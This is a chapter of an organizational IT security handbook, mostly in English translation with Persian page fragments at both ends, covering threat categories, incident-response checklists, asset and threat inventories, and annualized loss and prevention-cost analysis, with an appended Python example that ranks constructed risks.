‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ‪ ،‬ﺑﺎ ﺍﻇﻬﺎﺭ ﻧﻈﺮﻫـﺎﻳﻲ ﺍﺯ‬
‫ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺩﺭ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ‪ ،‬ﺑﻮﻳﮋﻩ‬
‫ﺩﺭ ﺭﺍﺑﻄــﻪ ﺑــﺎ ﺑﺨــﺶ ﻣــﺎﻟﻲ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ ﺗﺠــﺎﺭﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪.‬‬
‫‪ (Research Projects Agency‬ﺩﺭ ﻭﺯﺍﺭﺕ ﺩﻓــﺎﻉ ﺍﻳــﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ‪.‬‬
‫‪١٣٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
Chapter Three
Risk Evaluation and Loss Analysis

Overview

This chapter examines risk evaluation, loss analysis and security damage from a business perspective; it studies the origin, likely behaviour and severity of the effects of a range of security risks on day-to-day activities; it describes the main points of a sound security policy; and it also reviews the basic principles of loss analysis when a real security incident occurs.

Technology Development: New Frontiers

All organizations - small or large - are operating in a global environment. Advances in communications and transport networks over the past century have brought customers and markets closer together, minimized costs, and made it possible today to ship products to buyers anywhere in the world. From an international perspective, managers must consider a range of risks to their institutions. From the end of the 1990s onward, many severe attacks took place around the world (such as the attack on the World Trade Center in 2001). In the face of such events, the need for physical security became entirely clear: the need for a police presence around buildings, control of entry to buildings, sound policies for evacuating the premises when an incident occurs, and more reliable points of contact with local and national authorities.

On the technical side, correspondingly, work has begun on examining the threats that, from inside and outside the organization, are directed at computer equipment, applications, databases, and the networks that connect groups to one another. In the workplace, raw data such as customer records or credit card information are valuable targets for competitors and computer criminals and need special attention. In addition, in more advanced institutions, intellectual property such as scientific research documents or unique work processes is of great value and requires special security care. In a world where competition intensifies day by day, the theft of raw data and intellectual assets by computer is on the rise. Measures such as "preventive support", which is addressed in management's overall outlook and investment, staff training and awareness, and transparent communication within the organization help reduce the risks that arise from breaches of physical security and cyber security.

Know Ourselves

Although there are common plans and procedures for securing computer systems and buildings, a complete picture of the organization and the way it operates is needed in order to draw up a good security plan. The set of security policies and procedures needed by a company working in hazardous waste disposal or biological materials differs from that needed by an electronics manufacturer. To start the process by which management identifies potential security risks, it is useful to answer the following five questions:

1. What is the organization's main product or service? If there are several answers, try to prioritize them.
2. What are the organization's main sources of income and growth?
3. How is the organization structured? What are the different divisions and the main functions of each? How do these divisions operate; how do they communicate with one another; and how do they work as a single whole?
4. Which information is most sensitive for each division, and which technologies are used to store and distribute this information outside and inside the organization?
5. Who are the organization's customers, partners and vendors, and how do they interact with the organization?

The information needed to answer these questions can be obtained by talking with employees (especially information technology staff), managers and the company's board of directors. Assessing the views of customers and vendors on other matters may lead to the discovery of new security issues. Finally, the team that gathers the information should be familiar with what the media report about the company. Public opinion can also matter, especially if the company operates in a controversial industry or in a sensitive position, or if reports about it appear regularly in the press.
Know the Enemy: Internal and External Threats

Once the company has assessed its own structure and operation, it is in a good position to draw up a description of its potential security strengths and weaknesses. It is best to concentrate first on general threats. Once these have been identified, it becomes possible to assess the level of internal and external threat in the activities related to each of them.

The general threats to any company or formal organization are:

Physical threats
• Natural disasters (fire, earthquake, severe storms and flood);
• Theft;
• Vandalism;
• Physical interference;
• Network sabotage; and
• Organized espionage.

Software threats
• Penetration of firewalls;
• Malware (viruses, Trojans, worms);
• Unauthorized disclosure or destruction of data; and
• Organized espionage by digital means.

As far as human threats are concerned, the company must identify malicious actors both inside and outside. In some cases an internal security breach can be the result of human error: simple negligence, inattention, or insufficient staff training. In other areas, especially organized espionage, social engineering can be used to gain access to facilities and to the organizational and confidential data of knowledgeable people inside the company. An appropriate set of policies should be created by the security department, in cooperation with the personnel department, to help reduce the risks. The security and personnel departments can also work together on the procedures for hiring and dismissing staff. Although in some cases no clear motive can be found for malicious acts, the different motives behind destructive computer activity of this kind need detailed explanation. Classifying those who break into computers is not really feasible, but it is still possible to discuss in general terms the severity of the threats and, correspondingly, the damage to be expected from each.

Casual hackers (summertime hackers) are employees of an organization who are familiar with network protocols. These people usually do not intend to destroy the company's data and assets, but out of curiosity they try to reach resources they are not authorized to use. Even so, they may not be fully familiar with intrusion tools and may damage systems by using the tools incorrectly. In addition, if the tools were downloaded from the Internet they may contain a backdoor or a Trojan that other attackers make use of. Casual hacking is therefore regarded as a major threat, and this is also the most important reason it is forbidden.

Within the category of casual hackers, some staff break into the system because they are bored with their work or attracted by the technical challenge. Another group is after information about colleagues' promotions and pay, or organizational data. Others may do so in order to retaliate against the organization, or may cause unintended threats that stem from inadequate protection of the system owing to deficient technical training or staff carelessness.

"Script kiddies" are usually younger hackers (of high-school or pre-university age) who have good computer skills and a great deal of free time but are not very expert, and who use scripts written by others to carry out their intrusions. In general, members of this group do not concentrate on destruction in the way targeted criminals do (these are discussed later in this section), but they are numerous and sometimes work in teams, in which case they naturally pose a bigger threat. Script kiddies publicize their successful intrusions and claim fame in that way. In effect, they take pride in the notoriety gained from the sheer volume of their attacks. Because this threat is so common, the makers of security software have produced effective tools for preventing this kind of intrusion. Firewalls and intrusion detection systems (IDSs) were created to defend against such attacks.

Targeted criminals are usually expert attackers whose aim is to steal information, damage and destroy data, and put systems out of action for a period of time. Unlike casual hackers and script kiddies, their aim really is to break into systems. In some cases they are after valuable information such as financial data (credit card numbers and bank account details) or personal information (identification numbers, university records and customer files), in order to alter it or exploit it in some other way. Attackers of this kind are often well organized and, before launching the main attack, gather valuable information about the victim organization. Fortunately there are fewer criminals of this type than of the other types, but preventing their intrusions is very difficult and, if they succeed, they can cause serious damage.

Employees and consultants can create serious threats to the system, deliberately or inadvertently, depending on the nature of their relationships with their managers and colleagues in the workplace. Because of the level of access they have inside the organization, these people are a serious security concern.

Each of these potential human threats carries a different level of risk to the security of systems and information, and different methods are needed to prevent them. Up-to-date firewalls and intrusion detection systems may be enough to stop casual hackers or script kiddies. In the case of targeted criminals, however, it is alert system administrators and managers who must identify and stop them; here, personnel policies and management attention to neutralizing possible insider attacks will be useful. No plan is flawless, though, and it is very important that the organization continually reviews the record and the trend of these plans in the light of security intrusions. Continuous monitoring of the security landscape makes it easier to detect and prevent intrusions. In addition, adopting clear policies on what must be done during and after an attack helps reduce the damage, guides those responsible in dealing with the breakdown, and makes it possible to record properly the reports needed by authorities inside and outside the organization.

Practical Security Assessment: Risk Evaluation and Loss Analysis

As we have seen, security breaches have their roots in internal and external attacks and end in unauthorized access to systems and data for illegal and unethical purposes. The first steps toward a security policy are taken when the organization has a security assessment of its internal processes, its goals and its existing vulnerabilities. Once these elements have been analysed, a security policy and a plan for procedures can be developed.
This plan should contain information on the following key areas:

• Knowing when you are under attack - by using intrusion detection systems and internal vigilance.
• Preparing a worst-case scenario - thinking through the compounding effects that a security breach could have for you.
• Drawing up a written policy for recording security events (known as a break-in plan) - this written document helps in analysing individual events and in preventing successful attacks in the future.
• Hiring a specialist when needed - on a per-incident basis or under a periodic consulting agreement. Avoid hiring self-proclaimed hackers (people who claim to be hackers). The subject of outsourcing[63] security is discussed later in this part.
• Providing the necessary training for technical staff and other employees - many security failures result from a lack of adequate information about the procedures for dealing with security issues. Every member of staff in the company should know how to carry out the security procedures.
• Designating a point of contact - this person should be a specialist in information technology and should report events directly to the members of the management team.
• Understanding and prioritizing goals - which include all or some of the following:
  o protecting customer information;
  o preventing attacks;
  o notifying senior management of an attack;
  o logging events;
  o taking snapshots of the system;
  o contacting the computer security incident response team;
  o identifying the attacker;
  o identifying the people responsible in each case; and
  o identifying a person who can be trusted.

[63] This recommendation is mostly practical in medium-sized and large organizations, and also for companies that depend heavily on technology to carry out their activities and whose target market is the advanced technical market. In the second case, potential customers may form opinions about the company, based on its technical image and the robustness of its operations, that generate positive or negative publicity.

If an incident occurs, you can test the existing policies and procedures again and strengthen them as far as budget and logistics allow. When assessing the organization, there is a set of questions that can help you define the strengths and weaknesses of the security plan. A sample list, focused on the ability to respond effectively to an intrusion, follows:

Incident handling procedures, recovery plans and required funding:
  o Do procedures exist for responding to an incident?
  o Are the procedures understandable and up to date?
  o Have the plans needed for recovering from natural disasters been prepared?
  o Has sufficient funding been allocated for an appropriate response to an incident?

Procedures for security specialists and management:
  o Do the procedures include instructions for contacting the security specialist around the clock, seven days a week?
  o If the security specialist is not available, is there a way to inform management of the problem?
  o Has a method been defined for informing the chief information officer (if there is one) that possible incidents have occurred?
  o Is there a procedure for deciding when to contact outsiders to ask for help, and who should make that contact?

Staff procedures:
  o Have all key staff been trained to apply the procedures?
  o Do key staff really attend all the training sessions?
  o Were the key staff chosen because of their outstanding records?
  o Is communication between system administrators and security groups smooth?

Technical resources procedures:
  o Are there instructions for starting or stopping system programs?
  o Are the start-up or shutdown instructions of the plan reviewed periodically?
  o Have the tools needed for intrusion detection been installed and enabled on the system?
  o Can the detection software installed on the network identify unknown attacks?
  o Can you use a layered structure to detect attacks on the network and prevent them from taking place?
  o Can attacks be traced easily on the network?
  o According to a formal security audit, do all systems have adequate security controls?

Steps in Risk Evaluation

The first step in improving the security of your system is to answer these basic questions:

1. What am I trying to protect, and how much is it worth to me?
2. What do I need to protect against?
3. How much time, effort and money am I willing to spend to obtain adequate protection?

These questions form the basis of a process called risk assessment. Risk assessment is a very important part of the computer security process. If you do not know what you are protecting, and against what, you will not be able to work out the steps for protecting it. Once you know the risks, you can design the policies and techniques you need to implement your risk-reduction plans. For example, if there is a risk of a power failure and this matters to you, you should reduce the risk by using a UPS (uninterruptible power supply).

Risk assessment consists of three key steps:

1. Identifying assets and their value
2. Identifying threats
3. Calculating risks

There are many ways to carry out this process. One method that has been very successful so far is to hold a series of in-house workshops. In this method you invite knowledgeable users from different departments, middle managers and executives of your organization, and over a number of sessions you draw up a list of assets and threats. This process not only helps you produce a more complete list but also raises the participants' awareness of security issues.

A statistical approach is far too complex to be used for protecting a home computer or a very small company. Likewise, the procedures presented here are not sufficient for protecting large companies, government organizations and major universities. In such cases many organizations use consulting firms that specialize in risk assessment, and others use specialized assessment software.
Identifying Assets

Draw up a list of the items that need to be protected. This list should be based on your business plan and your common-sense knowledge. The process requires knowledge of the applicable laws, a complete understanding of your facilities, and knowledge of the extent of your insurance coverage. The items to be protected can be tangible (such as disk drives, monitors, network cables, backup equipment and manuals) or intangible (such as access to the computer, the master password, the ability to continue processing, the customer list, public image, and reputation in the industry). The list should include everything that is of value to you. To decide whether an item is valuable, consider what it would cost you in time and money to repair or replace it if it were damaged or lost. Some of the items that should definitely appear on your assessment list are:

Tangibles:
  o computers;
  o proprietary data;
  o backups and archives;
  o instructions, manuals and books;
  o printouts;
  o commercial software distribution media;
  o communications equipment and cabling;
  o personnel records; and
  o audited records.

Intangibles:
  o the safety and health of staff;
  o the privacy of users;
  o staff passwords;
  o the organization's public image and reputation;
  o customer goodwill;
  o the availability of processing; and
  o configuration information.

Rather than looking only at the computer-related aspects, you should take a broader view of the items above and of other related matters. If you are worried that someone might read your financial reports, the way in which that person gets at the information (whether through paper copies, through electronic mail, or through direct access to the backups) is of no particular importance, and every route for doing so should be blocked.

Identifying Threats

The next step is to draw up a list of the threats to your assets. Some threats are environmental and include fire, earthquake, explosion and flood. These lists should also include events that are very rare but possible, such as a general structural failure in the building or the discovery of flammable material in the walls of the computer room, which could force you to vacate the room for a not-so-short period. Other threats originate with staff and with people outside the organization. Here are some examples of threats of this kind:

• illness of key people;
• simultaneous illness of many staff (for example, contagious diseases such as influenza);
• loss of key personnel (death, retirement, end of term of employment);
• loss of telephone or network services;
• loss of utilities (telephone, electricity, water) for a short time;
• loss of utilities for a long time;
• lightning;
• flood;
• theft of disks or tapes;
• theft of a key person's laptop computer;
• theft of a key person's home computer;
• introduction of a virus into the systems;
• bankruptcy of vendors or of companies providing key services under contract to you;
• hardware faults;
• software faults;
• sabotage by employees;
• sabotage by third-party personnel (for example, a vendor's support staff);
• labour unrest;
• attackers who gain access to your machines at random;
• users who post inflammatory or proprietary organizational information on the Internet; and
• organized commercial espionage.
Calculating Risks

Risk assessment should not be done just once and then forgotten; it should be carried out continually and periodically - at least once a year, or whenever major changes take place in staff, systems or the operating environment.[70] In addition, whenever a serious change occurs in structure or operations, the threats must be assessed again. So if you reorganize, move to a new building, change the vendors you have contracts with, or make any other serious change, you should re-assess the threats and the potential damage.

[70] Changes in staff can mean the hiring and retirement of a large number of people, or the retirement of one of the people who has been active in the organization's security plan. Changes in systems can mean the installation of several new systems. If you have 100 computers and add 1 computer to the system while observing the security principles, a re-assessment of the risks is not necessary; but if, say, you have 10 computers and add another 10, this expansion may bring a completely new dimension to your organization. Other system changes can include setting up new internal and external networks, upgrading systems, or making changes to the computing platform. Changes in the organization usually consist of rapid growth, establishing relationships with foreign vendors or customers, and marketing companies that may establish you more firmly in local and global markets.

Loss Analysis

Determining the cost of losses can be very hard. A simple way of calculating it is to count only the cost of repairing or replacing the equipment and products. A more complex way is to include the costs of being unable to provide service, of retraining, of the additional procedures that result from the damage, of the loss of the company's reputation, and even of the damage caused to the company's customers. In general, adding ancillary factors to the cost calculation means more work but makes the estimate more accurate. In most cases there is no need to determine the exact value and cost of each risk; normally it is enough to assign a cost range to each threat. Some damaged items can be placed in the category of irreparable and irreplaceable, or unrecoverable, items, such as the complete erasure of the accounts database or the death of a key employee. You may wish to examine the cost of these losses on a finer scale; for example, consider a separate cost for each of the following:

• unavailability in the short term (less than 7 to 10 days);
• unavailability in the medium term (1 to 2 weeks);
• unavailability in the long term (more than 2 weeks);
• permanent loss or destruction;
• accidental loss or destruction;
• deliberate loss or destruction;
• unauthorized disclosure of information within the organization;
• unauthorized disclosure of information to outside sources;
• unauthorized and complete disclosure of information to all sources outside the organization, competitors and the press; and
• the cost of replacement or recovery.

Probability of Loss

Once you have identified the threats, you must estimate the likelihood of each one occurring. Estimating these threats on an annual basis is one of the simplest methods. Quantifying a risk is very difficult. You can obtain these estimates from other companies (such as an insurance company). If the event has occurred several times in succession, it can also be estimated from the records. Industry organizations usually collect statistics and publish reports. You can also bring your own guesses closer to reality on the basis of past experience. For example:

• On the basis of its experience over the past year, the power company has an estimate of the likelihood of a power failure during the coming year. The responsible officials can also calculate the risk of a power cut lasting a few seconds, a few minutes, or a few hours.
• Personnel records can help you estimate the probability that a key employee of the computer department will resign.
• The most optimistic guesses about a repetition of past experience can be used to estimate the probability that serious faults will be discovered in your software during the coming year.

If you expect an incident to occur more than once a year, record the number of times it occurs in the course of one year. For example, if you predict an earthquake once every 100 years, then according to the above it appears in your list as 1%; if, however, you expect three serious faults to be discovered in the Microsoft IIS server during the coming month, it will be 3600%.

Cost of Prevention

Finally, you must calculate the cost of preventing each kind of risk. For example, the cost of a momentary power failure will probably consist of the cost of staff downtime and of restarting the computers; the cost of preventing it, however, equals the cost of buying and installing a UPS system.

Costs should be amortized over the expected lifetime, using an appropriate approach. Working out these costs may reveal other costs and credits that should also be taken into account. For example, installing a better fire suppression system may reduce the fire insurance premium and give you a tax advantage through capital depreciation; but spending money on a fire suppression system means that the money is no longer available for other purposes such as staff training or even investment.

Adding Up the Results

At the summary stage you should draw up a multi-column table of assets, risks and possible losses. For each loss you should know its probability, the predicted damage, and the amount of money needed to prevent it. If you are very precise, you can also calculate the probability that the defensive measures prove inadequate. The process of deciding whether or not to use each defensive mechanism is now entirely clear. All you need to do is multiply the expected loss of each risk by the probability of its occurrence, so as to obtain a quantity for each threat. Sort these figures in descending order and compare the quantity for each threat with the cost of preventing it.

The result of this comparison is a prioritized list of what needs to be done. The list may be somewhat surprising at first. Bear in mind that your aim should be to prevent costly and probable losses and to pay less attention to rare and inexpensive ones. In many environments, events such as fire and the loss of key personnel are far more likely than a network break-in; yet, surprisingly, it is network break-ins that attract the attention of managers and, as a result, a large part of the budget. This practice is not cost-effective and does not provide the highest level of assurance for the system as a whole. To visualize the actions you need to take, classify by priority what you have collected on the prevention of, and recovery from, each incident. To do this, add the cost of recovery to the average expected loss and multiply the result by the probability of the incident occurring. Then compare the results with the annual cost of prevention. If the costs are less than the expected cost of the risk, it is recommended that you adopt the prevention strategy, provided sufficient financial resources are available; but if the cost of prevention is greater than the cost of the damage and of recovery after the incident, take no action until the incident occurs.
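The comparison described under "Probability of Loss", "Cost of Prevention" and "Adding Up the Results" can be carried through in code. The following Python example is added here and is not part of the handbook: every figure in it is constructed, straight-line amortization and the use of the midpoint of a loss range as the "average expected loss" are assumptions, and the "refine estimate" outcome is an extension beyond the text for the case where the loss range straddles the prevention cost.

```python
"""Annualized cost-benefit ranking of threats. All figures are constructed."""
from dataclasses import dataclass


def annual_rate(occurrences: float, per_years: float) -> float:
    """Expected occurrences per year: 1 per 100 years -> 0.01 (1%),
    3 per month (1/12 year) -> 36 (3600%)."""
    if occurrences < 0 or per_years <= 0:
        raise ValueError("occurrences must be >= 0 and per_years > 0")
    return occurrences / per_years


@dataclass(frozen=True)
class Risk:
    name: str
    rate: float                  # expected occurrences per year
    loss_low: float              # lower bound of loss per incident
    loss_high: float             # upper bound of loss per incident
    recovery_cost: float         # cost of recovery per incident
    safeguard_cost: float        # purchase and installation of the safeguard
    safeguard_life_years: float  # expected lifetime used for amortization

    def __post_init__(self):
        if self.loss_low > self.loss_high:
            raise ValueError(f"{self.name}: loss range is inverted")
        if self.safeguard_life_years <= 0:
            raise ValueError(f"{self.name}: lifetime must be positive")

    def exposure(self, loss: float) -> float:
        """(recovery cost + loss) multiplied by the annual probability."""
        return (self.recovery_cost + loss) * self.rate

    @property
    def expected_exposure(self) -> float:
        # Assumption: the average expected loss is the midpoint of the range.
        return self.exposure((self.loss_low + self.loss_high) / 2)

    @property
    def annual_safeguard_cost(self) -> float:
        # Assumption: straight-line amortization over the expected lifetime.
        return self.safeguard_cost / self.safeguard_life_years

    def decision(self) -> str:
        cost = self.annual_safeguard_cost
        if cost < self.exposure(self.loss_low):
            return "prevent"          # cheaper than even the best-case exposure
        if cost > self.exposure(self.loss_high):
            return "accept"           # dearer than even the worst-case exposure
        return "refine estimate"      # the range is too wide to decide


def prioritize(risks):
    """Sort by expected annual exposure, highest first, and attach a decision."""
    ranked = sorted(risks, key=lambda r: r.expected_exposure, reverse=True)
    return [(r.name, round(r.expected_exposure, 2),
             round(r.annual_safeguard_cost, 2), r.decision()) for r in ranked]


# Constructed sample register (hypothetical organization and currency units).
REGISTER = [
    Risk("momentary power failure (UPS)", annual_rate(4, 1),
         500, 1500, 200, 3000, 5),
    Risk("earthquake (building reinforcement)", annual_rate(1, 100),
         400_000, 800_000, 100_000, 200_000, 20),
    Risk("serious web server fault (patch service)", annual_rate(3, 1 / 12),
         100, 600, 50, 12_000, 1),
    Risk("loss of key employee (cross-training)", annual_rate(1, 5),
         20_000, 40_000, 10_000, 9_000, 3),
]

if __name__ == "__main__":
    for name, exposure, cost, verdict in prioritize(REGISTER):
        print(f"{name:45s} exposure/yr={exposure:>10.2f} "
              f"prevention/yr={cost:>9.2f} -> {verdict}")
```
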
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﭘﻨﺞ ﻣﺮﺣﻠﺔ ﻣﺠﺰﺍ ﺗﻘﺴﻴﻢ ﻛﺮﺩ‪:‬‬
‫ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫‪.۱‬‬
‫‪.۲‬‬
‫‪.۳‬‬
‫‪.۴‬‬
‫‪.۵‬‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺩﻭ ﺍﺻﻞ ﺍﺳﺎﺳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺩﺭ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ ﺍﺛـﺮﺑﺨﺶ‬
‫ﺳﻴﺎﺳﺖ ﻭ ﺍﻣﻨﻴﺖ ﺗﺄﺛﻴﺮ ﺿﻤﻨﻲ ﻣﻲﮔﺬﺍﺭﻧﺪ‪:‬‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺩﻓـﺎﻉ‬
‫ﻣﺆﺛﺮ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺩﺭ ﻓﺼﻞ ﻗﺒﻞ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﺑﺤـﺚ‬
‫ﺷﺪ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻭ ﺟﺰﺋﻴﺎﺕ ﻓﺮﺁﻳﻨﺪ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺍﺳﺎﺳﹰﺎ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻓﻨـﻲ ﺑـﺮﺍﻱ‬
‫ﻣــﺸﻜﻼﺕ ﻏﻴﺮﻓﻨــﻲ ﺍﺳــﺖ‪ .‬ﺯﻣــﺎﻥ‪ ،‬ﭘــﻮﻝ ﻭ ﺗــﻼﺵ ﺯﻳــﺎﺩﻱ ﺭﺍ‬
‫ﻣﻲﺗﻮﺍﻥ ﺑـﺮﺍﻱ ﺍﻳﻤـﻦ ﻛـﺮﺩﻥ ﺭﺍﻳﺎﻧـﻪ ﺻـﺮﻑ ﻛـﺮﺩ‪ ،‬ﺍﻣـﺎ ﻫﺮﮔـﺰ‬
‫ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﻧﮕﺮﺍﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﭘـﺎﻙﺷـﺪﻥ ﺗـﺼﺎﺩﻓﻲ ﺩﺍﺩﻩﻫـﺎ ﻳـﺎ‬
‫ﺗﺨﺮﻳﺐ ﻋﻤﺪﻱ ﺍﻃﻼﻋﺎﺕ ﺭﺍﺣﺖ ﺷﺪ‪ .‬ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻣﺠﻤﻮﻋﺔ‬
‫ﺷﺮﺍﻳﻂ ‪ -‬ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﺣﻮﺍﺩﺙ‪ ،‬ﺍﺷـﺘﺒﺎﻫﺎﺕ‪ ،‬ﺑـﺪﺍﻗﺒﺎﻟﻲ‪،‬‬
‫ﺁﺏ ﻭ ﻫﻮﺍﻱ ﺑﺪ ﻳﺎ ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﺠﻬﺰ ﻭ ﺑـﺎ ﺍﻧﮕﻴـﺰﻩ ‪ -‬ﻣـﺸﺎﻫﺪﻩ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻼ ﻣﻨﻬﺪﻡ ﺷﻮﺩ‪.‬‬
‫ﺑﮕﻴﺮﺩ‪ ،‬ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺑﻴﺎﻓﺘﺪ‪ ،‬ﻳﺎ ﺣﺘﻲ ﻛﺎﻣ ﹰ‬
‫ﻭﻇﻴﻔﺔ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺘﻲ ﻛﻤﻚ ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺗﺼﻤﻴﻢﮔﻴـﺮﻱ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺯﻣﺎﻥ ﻭ ﻫﺰﻳﻨﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣـﻲﺧﻮﺍﻫـﺪ ﺑـﺮﺍﻱ ﻣـﺴﺌﻠﻪ‬
‫ﺍﻣﻨﻴﺖ ﺍﺧﺘﺼﺎﺹ ﺩﻫﺪ‪ .‬ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻨﻜﺎﺭ ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ‬
‫ﻭﺟﻮﺩ ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﺧﻂﻣﺸﻲﻫـﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻨﺎﺳـﺐ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺍﺳﺖ ﺗﺎ ﺑﻮﺩﺟﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻫﺰﻳﻨﻪ ﺷـﻮﺩ‪ .‬ﺩﺭ ﻧﻬﺎﻳـﺖ‬
‫ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪﺍﻱ ﺑﺎﻳﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨـﺪ ﺗـﺎ ﺍﺯ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺻﺤﻴﺢ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ ﺑـﺮﺁﻭﺭﺩﻩﺷـﺪﻥ ﺍﻫـﺪﺍﻑ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴﺖ ﻋﻤﻠﻲ ﺑﻴﺶ ﺍﺯ ﺍﻳﻨﻜـﻪ ﻣـﺴﺌﻠﻪﺍﻱ‬
‫ﻓﻨﻲ ﺑﺎﺷﺪ‪ ،‬ﻣﺴﺌﻠﻪﺍﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺍﺳﺖ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻳﻜـﻲ‬
‫ﺍﺯ ﺍﻭﻟﻮﻳﺘﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺳﺎﺯﻣﺎﻥ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﺑـﺴﻴﺎﺭ‬
‫ﻛﻮﭼﻚ ﻛﻪ ﺑﻮﺩﺟﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺻﺮﻑ ﻧﻤﻲﺷـﻮﺩ‪،‬‬
‫ﻣﺪﻳﺮﻳﺖ ﺑﺎﻳﺪ ﻣﺴﺎﺋﻞ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭﻙ ﻛﻨﺪ ﻭ ﺍﺻﻮﻝ ﺍﻭﻟﻴـﺔ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ‪.‬‬
‫ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺍﺯ ﺑـﺎﻻ ﺑـﻪ‬
‫ﭘﺎﺋﻴﻦ ﮔﺴﺘﺮﺵ ﻳﺎﺑـﺪ‪ .‬ﻧﮕﺮﺍﻧﻴﻬـﺎ ﻭ ﺁﮔـﺎﻫﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻣـﺴﺎﺋﻞ‬
‫ﺍﻣﻨﻴﺘﻲ ﺣﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﺁﻧﻬـﺎ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﮔـﺴﺘﺮﺓ‬
